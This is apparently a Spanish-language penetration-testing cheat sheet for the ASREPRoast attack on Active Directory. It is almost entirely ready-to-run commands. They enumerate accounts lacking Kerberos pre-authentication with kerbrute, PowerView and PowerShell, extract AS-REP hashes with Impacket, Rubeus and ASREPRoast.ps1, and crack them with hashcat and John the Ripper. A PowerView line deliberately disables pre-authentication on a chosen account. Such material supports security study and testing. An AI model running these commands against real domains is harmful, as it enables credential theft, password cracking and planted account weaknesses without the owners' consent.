ASREPRoast

Descripción

Es posible obtener el Ticket Granting Ticket (TGT) para cualquier cuenta que tenga habilitada la configuración "Do not require Kerberos pre-authentication" (DONT_REQ_PREAUTH).

Linux/Unix

Enumeración de usuarios con DONT_REQ_PREAUTH habilitado.

Kerbrute

kerbrute userenum -d <ACME.LOCAL> --dc <IP-address-DC> <wordlists>
  • <wordlists> = ruta de wordlist de nombres de usuarios de dominio.

Impacket

GetNPUsers.py <ACME.LOCAL>/ -dc-ip <IP-address-DC> -no-pass -usersfile valid-ad-users.txt

Hashcat

Cracking de AS-REP.

hashcat -m 18200 as-rep.txt <path-wordlist>

John the Ripper

Cracking de AS-REP.

john as-rep.txt --format:krb5asrep --wordlist=<path-wordlist>

Windows

Enumeración de usuarios con DONT_REQ_PREAUTH habilitado.

# PowerView
Get-DomainUser -PreauthNotRequired | select SamAccountName, UserPrincipalName, UserAccountControl | fl

# Módulo ActiveDirectory PowerShell
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth

Obtención de AS-REP de usuario.

# Rubeus
.\Rubeus.exe asreproast /user:<user> /nowrap /format:hashcat

# ASREPRoast.ps1
Get-ASREPHash -UserName <user> -Verbose

Obtención de AS-REP de todos los usuarios.

# ASREPRoast.ps1
Invoke-ASREPRoast -Verbose

Habilitar configuración "Do not require Kerberos pre-authentication" (DONT_REQ_PREAUTH) para un usuario.

# PowerView
Set-DomainObject -Identity <user> -XOR @{useraccountcontrol=4194304} –Verbose

Última actualización